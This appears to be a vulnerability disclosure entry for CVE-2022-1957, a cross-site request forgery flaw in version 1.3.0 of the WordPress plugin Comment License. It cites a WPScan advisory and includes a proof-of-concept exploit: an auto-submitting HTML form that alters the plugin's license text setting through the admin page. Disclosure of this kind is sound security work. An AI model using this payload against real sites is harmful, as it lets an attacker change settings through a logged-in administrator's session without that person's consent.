CVE: CVE-2022-1957

Name: Comment License (comment-license)

Version: 1.3.0

Date: 2022-04-18 18:29:32

Advisory: https://wpscan.com/vulnerability/ad3f6f3d-e12c-4867-906c-73aa001c7351

Type: CSRF

Exploit: 


<form action="https://example.com/wp-admin/options-general.php" method="POST">
    <input type="text" name="akcl_text" value="changed content by hacker">
    <input type="text" name="ak_action" value="aktt_update_settings">
    <input type="text" name="ak_action" value="akcl_update_settings">
</form>
<script>
    document.forms[0].submit();
</script>